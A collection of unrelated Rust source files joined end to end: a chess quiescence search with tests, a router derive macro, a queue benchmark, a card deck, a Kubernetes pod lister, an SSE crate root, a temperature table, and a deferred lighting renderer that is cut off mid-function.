impl crate::Resettable for GICD_ICPENDR8_SPEC {
const RESET_VALUE: Self::Ux = 0;
}
|
//! Implements `StdQsearch` and `StdQsearchResult`.
use std::cell::UnsafeCell;
use std::marker::PhantomData;
use uci::{SetOption, OptionDescription};
use board::*;
use value::*;
use depth::*;
use moves::*;
use evaluator::Evaluator;
use qsearch::{Qsearch, QsearchParams, QsearchResult};
use move_generator::MoveGenerator;
use utils::MoveStack;
/// Implements the `QsearchResult` trait.
#[derive(Clone, Debug)]
pub struct StdQsearchResult {
value: Value,
searched_nodes: u64,
}
impl QsearchResult for StdQsearchResult {
#[inline]
fn new(value: Value, searched_nodes: u64) -> Self {
debug_assert!(VALUE_EVAL_MIN <= value && value <= VALUE_EVAL_MAX);
StdQsearchResult {
value: value,
searched_nodes: searched_nodes,
}
}
#[inline]
fn value(&self) -> Value {
self.value
}
#[inline]
fn searched_nodes(&self) -> u64 {
self.searched_nodes
}
}
/// Implements the `Qsearch` trait.
///
/// Performs classical quiescence search with stand pat, delta
/// pruning, static exchange evaluation, check evasions, limited
/// checks and recaptures.
pub struct StdQsearch<T: MoveGenerator> {
phantom: PhantomData<T>,
}
impl<T: MoveGenerator> Qsearch for StdQsearch<T> {
type MoveGenerator = T;
type QsearchResult = StdQsearchResult;
fn qsearch(params: QsearchParams<Self::MoveGenerator>) -> Self::QsearchResult {
debug_assert!(DEPTH_MIN <= params.depth && params.depth <= 0);
debug_assert!(params.lower_bound >= VALUE_MIN);
debug_assert!(params.upper_bound <= VALUE_MAX);
debug_assert!(params.lower_bound < params.upper_bound);
thread_local!(
static MOVE_STACK: UnsafeCell<MoveStack> = UnsafeCell::new(MoveStack::new())
);
let mut searched_nodes = 0;
let value = MOVE_STACK.with(|s| unsafe {
qsearch(params.position,
params.lower_bound,
params.upper_bound,
params.static_eval,
0,
-params.depth,
&mut *s.get(),
&mut searched_nodes)
});
StdQsearchResult::new(value, searched_nodes)
}
}
impl<T: MoveGenerator> SetOption for StdQsearch<T> {
fn options() -> Vec<(&'static str, OptionDescription)> {
T::options()
}
fn set_option(name: &str, value: &str) {
T::set_option(name, value)
}
}
/// A classical recursive quiescence search implementation.
fn qsearch<T: MoveGenerator>(position: &mut T,
mut lower_bound: Value, // alpha
upper_bound: Value, // beta
mut stand_pat: Value, // position's static evaluation
mut recapture_squares: Bitboard,
ply: i8, // the reached `qsearch` depth
move_stack: &mut MoveStack,
searched_nodes: &mut u64)
-> Value {
debug_assert!(lower_bound < upper_bound);
debug_assert!(stand_pat == VALUE_UNKNOWN ||
stand_pat == position.evaluator().evaluate(position.board()));
const PIECE_VALUES: [Value; 8] = [10000, 975, 500, 325, 325, 100, 0, 0];
let is_check = position.is_check();
// At the beginning of quiescence, position's static evaluation
// (`stand_pat`) is used to establish a lower bound on the
// result. We assume that even if none of the forcing moves can
// improve on the stand pat, there will be at least one "quiet"
// move that will at least preserve the stand pat value. (Note
// that this assumption is not true if the the side to move is in
// check, because in this case all possible check evasions will be
// tried.)
if is_check {
// Position's static evaluation is useless when in check.
stand_pat = lower_bound;
} else if stand_pat == VALUE_UNKNOWN {
stand_pat = position.evaluator().evaluate(position.board());
}
if stand_pat >= upper_bound {
return stand_pat;
}
if stand_pat > lower_bound {
lower_bound = stand_pat;
}
let obligatory_material_gain = (lower_bound as isize) - (stand_pat as isize) -
(PIECE_VALUES[KNIGHT] - 4 * PIECE_VALUES[PAWN] / 3) as isize;
// Generate all forcing moves. (Include checks only during the
// first ply.)
move_stack.save();
position.generate_forcing(ply <= 0, move_stack);
// Consider the generated moves one by one. See if any of them
// can raise the lower bound.
'trymoves: while let Some(m) = move_stack.pull_best() {
let move_type = m.move_type();
let dest_square_bb = 1 << m.dest_square();
let captured_piece = m.captured_piece();
// Decide whether to try the move. Check evasions,
// en-passant captures (for them SEE is often wrong), and
// mandatory recaptures are always tried. (In order to
// correct SEE errors due to pinned and overloaded pieces,
// at least one mandatory recapture is always tried at the
// destination squares of previous moves.) For all other
// moves, a static exchange evaluation is performed to
// decide if the move should be tried.
if !is_check && move_type != MOVE_ENPASSANT && recapture_squares & dest_square_bb == 0 {
match position.evaluate_move(m) {
// A losing move -- do not try it.
x if x < 0 => continue 'trymoves,
// An even exchange -- try it only during the first few plys.
0 if ply >= 2 && captured_piece < PIECE_NONE => continue 'trymoves,
// A safe or winning move -- try it always.
_ => (),
}
}
// Try the move.
if position.do_move(m).is_some() {
// If the move does not give check, ensure that
// the immediate material gain from the move is
// big enough.
if !position.is_check() {
let material_gain = if move_type == MOVE_PROMOTION {
PIECE_VALUES[captured_piece] +
PIECE_VALUES[Move::piece_from_aux_data(m.aux_data())] -
PIECE_VALUES[PAWN]
} else {
unsafe { *PIECE_VALUES.get_unchecked(captured_piece) }
};
if (material_gain as isize) < obligatory_material_gain {
position.undo_move(m);
continue 'trymoves;
}
}
// Recursively call `qsearch`.
*searched_nodes += 1;
let value = -qsearch(position,
-upper_bound,
-lower_bound,
VALUE_UNKNOWN,
recapture_squares ^ dest_square_bb,
ply + 1,
move_stack,
searched_nodes);
position.undo_move(m);
// Update the lower bound.
if value >= upper_bound {
lower_bound = value;
break 'trymoves;
}
if value > lower_bound {
lower_bound = value;
}
// Mark that a recapture at this square has been tried.
recapture_squares &= !dest_square_bb;
}
}
move_stack.restore();
// Return the determined lower bound. (We should make sure
// that the returned value is between `VALUE_EVAL_MIN` and
// `VALUE_EVAL_MAX`, regardless of the initial bounds passed
// to `qsearch`. If we do not take this precautions, the
// search algorithm will abstain from checkmating the
// opponent, seeking the huge material gain that `qsearch`
// promised.)
match lower_bound {
x if x < VALUE_EVAL_MIN => VALUE_EVAL_MIN,
x if x > VALUE_EVAL_MAX => VALUE_EVAL_MAX,
x => x,
}
}
#[cfg(test)]
mod tests {
use board::*;
use value::*;
use move_generator::*;
use stock::{SimpleEvaluator, StdMoveGenerator};
use utils::MoveStack;
type P = StdMoveGenerator<SimpleEvaluator>;
#[test]
fn qsearch() {
use super::qsearch;
let mut s = MoveStack::new();
let d = 32;
let fen = "8/8/8/8/6k1/6P1/8/6K1 b - - 0 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);
let fen = "8/8/8/8/6k1/6P1/8/5bK1 b - - 0 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) > 225 - d);
let fen = "8/8/8/8/5pkp/6P1/5P1P/6K1 b - - 0 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);
let fen = "8/8/8/8/5pkp/6P1/5PKP/8 b - - 0 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) <= -100 + d);
let fen = "r1bqkbnr/pppp2pp/2n2p2/4p3/2N1P2B/3P1N2/PPP2PPP/R2QKB1R w - - 5 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);
let fen = "r1bqkbnr/pppp2pp/2n2p2/4N3/4P2B/3P1N2/PPP2PPP/R2QKB1R b - - 5 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) <= -100 + d);
let fen = "rn2kbnr/ppppqppp/8/4p3/2N1P1b1/3P1N2/PPP2PPP/R1BKQB1R w - - 5 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);
let fen = "8/8/8/8/8/7k/7q/7K w - - 0 1";
let board = Board::from_fen(fen).ok().unwrap();
let mut p = P::from_board(board).ok().unwrap();
assert!(qsearch(&mut p, -10000, 10000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) <= -10000);
}
}
|
use proc_macro::TokenStream;
use quote::quote;
use syn;
use syn::parse_macro_input;
use syn::{Data, DeriveInput, Field, Fields, Ident};
pub fn from_captures_impl(input: TokenStream) -> TokenStream {
let input = parse_macro_input!(input as DeriveInput);
let name = input.ident;
let fields: Vec<Field> = match input.data {
Data::Struct(ds) => {
match ds.fields {
Fields::Named(fields_named) => {
fields_named.named.iter().cloned().collect::<Vec<_>>()
}
Fields::Unnamed(_) => {
panic!("Deriving FromCaptures not supported for Tuple Structs.")
}
Fields::Unit => {
panic!("Deriving FromCaptures not supported for Unit Structs, but it should be in the near future. Open an issue .")
}
}
}
Data::Enum(_de) => {
panic!("Deriving FromCaptures not supported for Enums.")
}
Data::Union(_du) => {
panic!("Deriving FromCaptures not supported for Unions.")
}
};
let keys = fields
.iter()
.cloned()
.map(|f: Field| f.ident.unwrap())
.map(|i: Ident| i.to_string())
.collect::<Vec<_>>();
let idents = fields.iter().cloned().map(|f: Field| f.ident.unwrap());
let idents2 = idents.clone();
let types = fields.iter().cloned().map(|f| f.ty);
let assignments = quote! {
#(
let #idents = captures
.get(#keys)
.map_or_else(
|| {
<#types as ::yew_router::matcher::FromCapturedKeyValue>::key_not_available()
.ok_or_else(|| {
::yew_router::matcher::FromCapturesError::MissingField {
field_name: #keys.to_string()
}
})
},
|m: &String| {
let x: Result<#types, ::yew_router::matcher::FromCapturesError> = ::yew_router::matcher::FromCapturedKeyValue::from_value(m.as_str())
.ok_or_else(|| {
::yew_router::matcher::FromCapturesError::FailedParse {
field_name: #keys.to_string(),
source_string: m.clone()
}
});
x
}
)?;
)*
};
let expanded = quote! {
impl ::yew_router::matcher::FromCaptures for #name {
fn from_captures(captures: &::yew_router::matcher::Captures) -> Result<Self, ::yew_router::matcher::FromCapturesError> {
#assignments
let x = #name {
#(#idents2),*
};
Ok(x)
}
fn verify(captures: &::std::collections::HashSet<String>) {
#(
if !captures.contains(&#keys.to_string()) {
panic!("The struct expected the matches to contain a field named '{}'", #keys.to_string())
}
)*
}
}
};
TokenStream::from(expanded)
}
|
extern crate crossbeam;
extern crate pipeline;
extern crate time;
use pipeline::queue::multiqueue::{MultiReader, MultiWriter, multiqueue};
use time::precise_time_ns;
use crossbeam::scope;
use std::sync::atomic::{AtomicUsize, Ordering, fence};
use std::sync::Barrier;
fn recv(bar: &Barrier, reader: MultiReader<Option<u64>>) -> u64 {
bar.wait();
let start = precise_time_ns();
let mut cur = 0;
loop {
if let Some(popped) = reader.pop() {
match popped {
None => break,
Some(pushed) => {
if (cur != pushed) {
panic!("Dang");
}
cur += 1;
}
}
}
}
precise_time_ns() - start
}
fn Send(bar: &Barrier, writer: MultiWriter<Option<u64>>, num_push: usize) {
bar.wait();
for i in 0..num_push as u64 {
loop {
let topush = Some(i);
if let Ok(_) = writer.push(topush) {
break;
}
}
}
writer.push(None);
}
fn main() {
let num_do = 100000;
let (writer, reader) = multiqueue(20000);
let bar = Barrier::new(2);
let bref = &bar;
scope(|scope| {
scope.spawn(move || {
Send(bref, writer, num_do);
});
let ns_spent = recv(bref, reader) as f64;
let ns_per_item = ns_spent / (num_do as f64);
println!("Time spent doing {} push/pop pairs (without waiting on the popped result!) was {} ns per item", num_do, ns_per_item);
});
} |
use rand::Rng;
// Default 4 suit deck cards
#[derive(Serialize, Deserialize, Debug)]
pub enum Card {
Heart(i32), // Hertta
Spade(i32), // Pata
Diamond(i32), // Ruutu
Club(i32), // Risti
Hidden, // Hidden or back side of a card
}
impl Card {
pub fn get_line(&self, line: usize) -> String {
let suit = self.get_suit();
let value = get_value_for_card(self.get_value());
let bg = self.get_background();
match line {
0 => {
String::from("┌─────┐")
},
1 => {
String::from(format!("│{}{}{}{}{}│", suit, bg, bg, bg, bg))
},
2 => {
String::from(format!("│{}{}{}{}│", bg, bg, value, bg))
},
3 => {
String::from(format!("│{}{}{}{}{}│", bg, bg, bg, bg, suit))
},
4 => {
String::from("└─────┘")
},
_ => String::new()
}
}
fn get_value(&self) -> i32 {
use self::Card::*;
match self {
Heart(v) => *v,
Diamond(v) => *v,
Spade(v) => *v,
Club(v) => *v,
Hidden => 0,
}
}
fn get_suit(&self) -> char {
use self::Card::*;
match self {
Heart(_) => '♥',
Diamond(_) => '♦',
Spade(_) => '♣',
Club(_) => '♠',
Hidden => '░',
}
}
fn get_background(&self) -> char {
match self {
Card::Hidden => '░',
_ => ' '
}
}
pub fn random<R: Rng + ?Sized>(rng: &mut R) -> Card
{
use self::Card::*;
let value = rng.gen_range(1, 14);
let suit = rng.gen_range(0, 4);
match suit {
0 => Heart(value),
1 => Diamond(value),
2 => Spade(value),
3 => Club(value),
_ => Hidden
}
}
}
#[derive(Serialize, Deserialize, Debug)]
pub struct Deck {
pub cards: Vec<Card>
}
impl Deck {
pub fn new() -> Deck {
let mut cards = Vec::new();
for i in 1 ..= 13 {
cards.push(Card::Heart(i));
cards.push(Card::Spade(i));
cards.push(Card::Diamond(i));
cards.push(Card::Club(i));
}
Deck {
cards
}
}
pub fn empty() -> Deck {
Deck {
cards: Vec::new(),
}
}
pub fn insert(&mut self, card: Card) {
self.cards.push(card);
}
pub fn draw(&mut self) -> Card {
if let Some(card) = self.cards.pop() {
card
} else {
Card::Hidden
}
}
pub fn shuffle<R: Rng + ?Sized>(&mut self, rng: &mut R) {
rng.shuffle(&mut self.cards[..]);
}
pub fn print(&self) {
print_deck(&self.cards[..]);
}
}
pub fn print_deck(cards: &[Card]) {
for l in 0 .. 5 {
for c in 0 .. cards.len() {
print!("{}", cards[c].get_line(l));
}
println!("");
}
}
fn get_value_for_card(value: i32) -> &'static str {
match value {
1 => "1 ",
2 => "2 ",
3 => "3 ",
4 => "4 ",
5 => "5 ",
6 => "6 ",
7 => "7 ",
8 => "8 ",
9 => "9 ",
10 => "10",
11 => "J ",
12 => "Q ",
13 => "K ",
_ => "?░"
}
}
|
use k8s_openapi::api::core::v1::Pod;
use kube::{
api::{Api, ListParams},
Client,
};
use tracing::*;
#[tokio::main]
async fn main() -> anyhow::Result<()> {
tracing_subscriber::fmt::init();
let client = Client::try_default().await?;
// Equivalent to `kubectl get pods --all-namespace \
// -o jsonpath='{.items[*].spec.containers[*].image}'`
let field_selector = std::env::var("FIELD_SELECTOR").unwrap_or_default();
let jsonpath = format!(
"{}{}",
"$",
std::env::var("JSONPATH").unwrap_or_else(|_| ".items[*].spec.containers[*].image".into())
);
let pods: Api<Pod> = Api::<Pod>::all(client);
let list_params = ListParams::default().fields(&field_selector);
let list = pods.list(&list_params).await?;
// Use the given JSONPATH to filter the ObjectList
let list_json = serde_json::to_value(&list)?;
let res = jsonpath_lib::select(&list_json, &jsonpath).unwrap();
info!("\t\t {:?}", res);
Ok(())
}
|
//! Async Server Sent Event parser and encoder.
//!
//! # Example
//!
//! ```norun
//! use tide::Request;
//!
//! #[async_std::main]
//! async fn main() -> http_types::Result<()> {
//! let mut app = tide::new();
//!
//! app.at("/sse").get(|req| async move {
//! let mut res = tide_compressed_sse::upgrade(req, |_req: Request<()>, sender| async move {
//! sender.send("message", "foo", None).await?;
//!
//! Ok(())
//! });
//!
//! Ok(res)
//! });
//!
//! app.listen("localhost:8080").await?;
//!
//! Ok(())
//! }
//! ```
//!
//! # References
//!
//! - [SSE Spec](https://html.spec.whatwg.org/multipage/server-sent-events.html#concept-event-stream-last-event-id)
//! - [EventSource web platform tests](https://github.com/web-platform-tests/wpt/tree/master/eventsource)
#![forbid(rust_2018_idioms)]
#![deny(missing_debug_implementations, nonstandard_style)]
#![warn(missing_docs, missing_doc_code_examples)]
mod decoder;
mod encoder;
mod event;
mod handshake;
mod lines;
mod message;
mod tide;
use encoder::encode;
use event::Event;
use message::Message;
pub use crate::tide::upgrade::upgrade;
pub use crate::tide::Sender;
/// Exports for tests
#[cfg(feature = "__internal_test")]
pub mod internals {
pub use crate::decoder::{decode, Decoder};
pub use crate::encoder::{encode, Encoder};
pub use crate::event::Event;
}
pub(crate) use lines::Lines;
|
fn main() {
// Header
println!("===================");
println!("| Fahr | Cels |");
for fahr in (0..101).step_by(10) {
let cels = fahr_cels(fahr);
println!("| {:5} | {:5.1} |",
fahr, cels);
}
// Footer
println!("===================");
// Header again
println!("===================");
println!("| Cels | Fahr |");
for cels in (0..101).step_by(10) {
let fahr = cels_fahr(cels);
println!("| {:5} | {:5.1} |",
cels, fahr);
}
// Footer again
println!("===================");
}
fn fahr_cels(fahr: i32) -> f64 {
let ratio = 5_f64 / 9_f64;
let cels: f64 = (fahr - 32) as f64 * ratio;
return cels
}
fn cels_fahr(cels: i32) -> f64 {
let ratio = 9_f64 / 5_f64;
let fahr: f64 = (cels as f64 * ratio) + 32_f64;
return fahr
}
|
use std::{
rc::Rc,
cell::RefCell,
};
use crate::{
renderer::{
flat_shader::FlatShader,
surface::SurfaceSharedData,
framework::{
gl,
gpu_texture::GpuTexture,
gpu_program::{
UniformLocation,
GpuProgram,
UniformValue,
},
framebuffer::{
DrawParameters,
CullFace,
FrameBufferTrait,
},
state::{
State,
ColorMask,
StencilFunc,
StencilOp,
},
},
gbuffer::GBuffer,
error::RendererError,
shadow_map_renderer::{
PointShadowMapRenderContext,
SpotShadowMapRenderer,
PointShadowMapRenderer,
},
QualitySettings,
RenderPassStatistics,
GeometryCache,
TextureCache,
ssao::ScreenSpaceAmbientOcclusionRenderer,
},
scene::{
camera::Camera,
Scene,
node::Node,
light::LightKind,
},
core::{
scope_profile,
math::{
vec3::Vec3,
mat4::Mat4,
frustum::Frustum,
Rect,
},
color::Color,
},
};
use crate::renderer::light_volume::LightVolumeRenderer;
struct AmbientLightShader {
program: GpuProgram,
wvp_matrix: UniformLocation,
diffuse_texture: UniformLocation,
ambient_color: UniformLocation,
ao_sampler: UniformLocation,
}
impl AmbientLightShader {
fn new() -> Result<Self, RendererError> {
let fragment_source = include_str!("shaders/ambient_light_fs.glsl");
let vertex_source = include_str!("shaders/ambient_light_vs.glsl");
let program = GpuProgram::from_source("AmbientLightShader", vertex_source, fragment_source)?;
Ok(Self {
wvp_matrix: program.uniform_location("worldViewProjection")?,
diffuse_texture: program.uniform_location("diffuseTexture")?,
ambient_color: program.uniform_location("ambientColor")?,
ao_sampler: program.uniform_location("aoSampler")?,
program,
})
}
}
struct SpotLightShader {
program: GpuProgram,
wvp_matrix: UniformLocation,
depth_sampler: UniformLocation,
color_sampler: UniformLocation,
normal_sampler: UniformLocation,
spot_shadow_texture: UniformLocation,
light_view_proj_matrix: UniformLocation,
shadows_enabled: UniformLocation,
soft_shadows: UniformLocation,
shadow_map_inv_size: UniformLocation,
light_position: UniformLocation,
light_radius: UniformLocation,
light_color: UniformLocation,
light_direction: UniformLocation,
half_hotspot_cone_angle_cos: UniformLocation,
half_cone_angle_cos: UniformLocation,
inv_view_proj_matrix: UniformLocation,
camera_position: UniformLocation,
}
impl SpotLightShader {
fn new() -> Result<Self, RendererError> {
let fragment_source = include_str!("shaders/deferred_spot_light_fs.glsl");
let vertex_source = include_str!("shaders/deferred_light_vs.glsl");
let program = GpuProgram::from_source("DeferredLightShader", vertex_source, fragment_source)?;
Ok(Self {
wvp_matrix: program.uniform_location("worldViewProjection")?,
depth_sampler: program.uniform_location("depthTexture")?,
color_sampler: program.uniform_location("colorTexture")?,
normal_sampler: program.uniform_location("normalTexture")?,
spot_shadow_texture: program.uniform_location("spotShadowTexture")?,
light_view_proj_matrix: program.uniform_location("lightViewProjMatrix")?,
shadows_enabled: program.uniform_location("shadowsEnabled")?,
soft_shadows: program.uniform_location("softShadows")?,
shadow_map_inv_size: program.uniform_location("shadowMapInvSize")?,
light_position: program.uniform_location("lightPos")?,
light_radius: program.uniform_location("lightRadius")?,
light_color: program.uniform_location("lightColor")?,
light_direction: program.uniform_location("lightDirection")?,
half_hotspot_cone_angle_cos: program.uniform_location("halfHotspotConeAngleCos")?,
half_cone_angle_cos: program.uniform_location("halfConeAngleCos")?,
inv_view_proj_matrix: program.uniform_location("invViewProj")?,
camera_position: program.uniform_location("cameraPosition")?,
program,
})
}
}
struct PointLightShader {
program: GpuProgram,
wvp_matrix: UniformLocation,
depth_sampler: UniformLocation,
color_sampler: UniformLocation,
normal_sampler: UniformLocation,
point_shadow_texture: UniformLocation,
shadows_enabled: UniformLocation,
soft_shadows: UniformLocation,
light_position: UniformLocation,
light_radius: UniformLocation,
light_color: UniformLocation,
inv_view_proj_matrix: UniformLocation,
camera_position: UniformLocation,
}
impl PointLightShader {
fn new() -> Result<Self, RendererError> {
let fragment_source = include_str!("shaders/deferred_point_light_fs.glsl");
let vertex_source = include_str!("shaders/deferred_light_vs.glsl");
let program = GpuProgram::from_source("DeferredLightShader", vertex_source, fragment_source)?;
Ok(Self {
wvp_matrix: program.uniform_location("worldViewProjection")?,
depth_sampler: program.uniform_location("depthTexture")?,
color_sampler: program.uniform_location("colorTexture")?,
normal_sampler: program.uniform_location("normalTexture")?,
point_shadow_texture: program.uniform_location("pointShadowTexture")?,
shadows_enabled: program.uniform_location("shadowsEnabled")?,
soft_shadows: program.uniform_location("softShadows")?,
light_position: program.uniform_location("lightPos")?,
light_radius: program.uniform_location("lightRadius")?,
light_color: program.uniform_location("lightColor")?,
inv_view_proj_matrix: program.uniform_location("invViewProj")?,
camera_position: program.uniform_location("cameraPosition")?,
program,
})
}
}
struct DirectionalLightShader {
program: GpuProgram,
wvp_matrix: UniformLocation,
depth_sampler: UniformLocation,
color_sampler: UniformLocation,
normal_sampler: UniformLocation,
light_direction: UniformLocation,
light_color: UniformLocation,
inv_view_proj_matrix: UniformLocation,
camera_position: UniformLocation,
}
impl DirectionalLightShader {
fn new() -> Result<Self, RendererError> {
let fragment_source = include_str!("shaders/deferred_directional_light_fs.glsl");
let vertex_source = include_str!("shaders/deferred_light_vs.glsl");
let program = GpuProgram::from_source("DeferredLightShader", vertex_source, fragment_source)?;
Ok(Self {
wvp_matrix: program.uniform_location("worldViewProjection")?,
depth_sampler: program.uniform_location("depthTexture")?,
color_sampler: program.uniform_location("colorTexture")?,
normal_sampler: program.uniform_location("normalTexture")?,
light_direction: program.uniform_location("lightDirection")?,
light_color: program.uniform_location("lightColor")?,
inv_view_proj_matrix: program.uniform_location("invViewProj")?,
camera_position: program.uniform_location("cameraPosition")?,
program,
})
}
}
pub struct DeferredLightRenderer {
pub ssao_renderer: ScreenSpaceAmbientOcclusionRenderer,
spot_light_shader: SpotLightShader,
point_light_shader: PointLightShader,
directional_light_shader: DirectionalLightShader,
ambient_light_shader: AmbientLightShader,
quad: SurfaceSharedData,
sphere: SurfaceSharedData,
flat_shader: FlatShader,
spot_shadow_map_renderer: SpotShadowMapRenderer,
point_shadow_map_renderer: PointShadowMapRenderer,
light_volume: LightVolumeRenderer,
}
pub struct DeferredRendererContext<'a> {
pub state: &'a mut State,
pub scene: &'a Scene,
pub camera: &'a Camera,
pub gbuffer: &'a mut GBuffer,
pub white_dummy: Rc<RefCell<GpuTexture>>,
pub ambient_color: Color,
pub settings: &'a QualitySettings,
pub textures: &'a mut TextureCache,
pub geometry_cache: &'a mut GeometryCache,
}
impl DeferredLightRenderer {
pub fn new(state: &mut State, frame_size: (u32, u32), settings: &QualitySettings) -> Result<Self, RendererError> {
Ok(Self {
ssao_renderer: ScreenSpaceAmbientOcclusionRenderer::new(state, frame_size.0 as usize, frame_size.1 as usize)?,
spot_light_shader: SpotLightShader::new()?,
point_light_shader: PointLightShader::new()?,
directional_light_shader: DirectionalLightShader::new()?,
ambient_light_shader: AmbientLightShader::new()?,
quad: SurfaceSharedData::make_unit_xy_quad(),
sphere: SurfaceSharedData::make_sphere(6, 6, 1.0),
flat_shader: FlatShader::new()?,
spot_shadow_map_renderer: SpotShadowMapRenderer::new(state, settings.spot_shadow_map_size)?,
point_shadow_map_renderer: PointShadowMapRenderer::new(state, settings.point_shadow_map_size)?,
light_volume: LightVolumeRenderer::new()?
})
}
pub fn set_quality_settings(&mut self, state: &mut State, settings: &QualitySettings) -> Result<(), RendererError> {
if settings.spot_shadow_map_size != self.spot_shadow_map_renderer.size {
self.spot_shadow_map_renderer = SpotShadowMapRenderer::new(state, settings.spot_shadow_map_size)?;
}
if settings.point_shadow_map_size != self.point_shadow_map_renderer.size {
self.point_shadow_map_renderer = PointShadowMapRenderer::new(state, settings.point_shadow_map_size)?;
}
self.ssao_renderer.set_radius(settings.ssao_radius);
Ok(())
}
pub fn set_frame_size(&mut self, state: &mut State, frame_size: (u32, u32)) -> Result<(), RendererError> {
self.ssao_renderer = ScreenSpaceAmbientOcclusionRenderer::new(state, frame_size.0 as usize, frame_size.1 as usize)?;
Ok(())
}
#[must_use]
pub fn render(&mut self, args: DeferredRendererContext) -> RenderPassStatistics {
scope_profile!();
let mut statistics = RenderPassStatistics::default();
let DeferredRendererContext {
state, scene, camera,
gbuffer, white_dummy, ambient_color,
settings, textures, geometry_cache
} = args;
let viewport = Rect::new(0, 0, gbuffer.width, gbuffer.height);
let frustum = Frustum::from(camera.view_projection_matrix()).unwrap();
let frame_matrix =
Mat4::ortho(0.0, viewport.w as f32, viewport.h as f32, 0.0, -1.0, 1.0) *
Mat4::scale(Vec3::new(viewport.w as f32, viewport.h as f32, 0.0));
let projection_matrix = camera.projection_matrix();
let view_projection = camera.view_projection_matrix();
let inv_view_projection = view_projection.inverse().unwrap_or_default();
// Fill SSAO map.
if settings.use_ssao {
statistics += self.ssao_renderer.render(
state,
gbuffer,
geometry_cache,
projection_matrix,
camera.view_matrix().basis(),
);
}
gbuffer.final_frame.clear(state, viewport, Some(Color::from_rgba(0, 0, 0, 0)), None, Some(0));
// Ambient light.
gbuffer.final_frame.draw(
geometry_cache.get(state, &self.quad),
state,
viewport,
&self.ambient_light_shader.program,
DrawParameters {
cull_face: CullFace::Back,
culling: false,
color_write: Default::default(),
depth_write: false,
stencil_test: false,
depth_test: false,
blend: false,
},
&[
(self.ambient_light_shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
(self.ambient_light_shader.ambient_color, UniformValue::Color(ambient_color)),
(self.ambient_light_shader.diffuse_texture, UniformValue::Sampler {
index: 0,
texture: gbuffer.diffuse_texture(),
}),
(self.ambient_light_shader.ao_sampler, UniformValue::Sampler {
index: 1,
texture: if settings.use_ssao {
self.ssao_renderer.ao_map()
} else {
white_dummy.clone()
},
})
],
);
state.set_blend(true);
state.set_blend_func(gl::ONE, gl::ONE);
for light in scene.graph.linear_iter().filter_map(|node| {
if let Node::Light(light) = node { Some(light) } else { None }
}) {
if !light.global_visibility() {
continue;
}
let raw_radius = match light.kind() {
LightKind::Spot(spot_light) => spot_light.distance(),
LightKind::Point(point_light) => point_light.radius(),
LightKind::Directional => { std::f32::MAX }
};
let light_position = light.global_position();
let light_radius_scale = light.local_transform().scale().max_value();
let light_radius = light_radius_scale * raw_radius;
let light_r_inflate = 1.05 * light_radius;
let light_radius_vec = Vec3::new(light_r_inflate, light_r_inflate, light_r_inflate);
let emit_direction = light.up_vector().normalized().unwrap_or(Vec3::LOOK);
if !frustum.is_intersects_sphere(light_position, light_radius) {
continue;
}
let distance_to_camera = (light.global_position() - camera.global_position()).len();
let mut light_view_projection = Mat4::IDENTITY;
let shadows_enabled = light.is_cast_shadows() && match light.kind() {
LightKind::Spot(spot) if distance_to_camera <= settings.spot_shadows_distance && settings.spot_shadows_enabled => {
let light_projection_matrix = Mat4::perspective(
spot.full_cone_angle(),
1.0,
0.01,
light_radius,
);
let light_look_at = light_position - emit_direction;
let light_up_vec = light.look_vector().normalized().unwrap_or(Vec3::UP);
let light_view_matrix = Mat4::look_at(light_position, light_look_at, light_up_vec)
.unwrap_or_default();
light_view_projection = light_projection_matrix * light_view_matrix;
statistics += self.spot_shadow_map_renderer.render(
state,
&scene.graph,
&light_view_projection,
white_dummy.clone(),
textures,
geometry_cache,
);
true
}
LightKind::Point(_) if distance_to_camera <= settings.point_shadows_distance && settings.point_shadows_enabled => {
statistics += self.point_shadow_map_renderer.render(
PointShadowMapRenderContext {
state,
graph: &scene.graph,
white_dummy: white_dummy.clone(),
light_pos: light_position,
light_radius,
texture_cache: textures,
geom_cache: geometry_cache,
}
);
true
}
LightKind::Directional => {
// TODO: Add cascaded shadow map.
false
}
_ => false
};
// Mark lighted areas in stencil buffer to do light calculations only on them.
state.set_stencil_mask(0xFFFF_FFFF);
state.set_stencil_func(StencilFunc { func: gl::ALWAYS, ..Default::default() });
state.set_stencil_op(StencilOp { zfail: gl::INCR, ..Default::default() });
let sphere = geometry_cache.get(state, &self.sphere);
statistics += gbuffer.final_frame.draw(
sphere,
state,
viewport,
&self.flat_shader.program,
DrawParameters {
cull_face: CullFace::Front,
culling: true,
color_write: ColorMask::all(false),
depth_write: false,
stencil_test: true,
depth_test: true,
blend: false,
},
&[
(self.flat_shader.wvp_matrix, UniformValue::Mat4(
view_projection * Mat4::translate(light_position) * Mat4::scale(light_radius_vec)
))
],
);
state.set_stencil_func(StencilFunc { func: gl::ALWAYS, ..Default::default() });
state.set_stencil_op(StencilOp { zfail: gl::DECR, ..Default::default() });
statistics += gbuffer.final_frame.draw(
sphere,
state,
viewport,
&self.flat_shader.program,
DrawParameters {
cull_face: CullFace::Back,
culling: true,
color_write: ColorMask::all(false),
depth_write: false,
stencil_test: true,
depth_test: true,
blend: false,
},
&[
(self.flat_shader.wvp_matrix, UniformValue::Mat4(
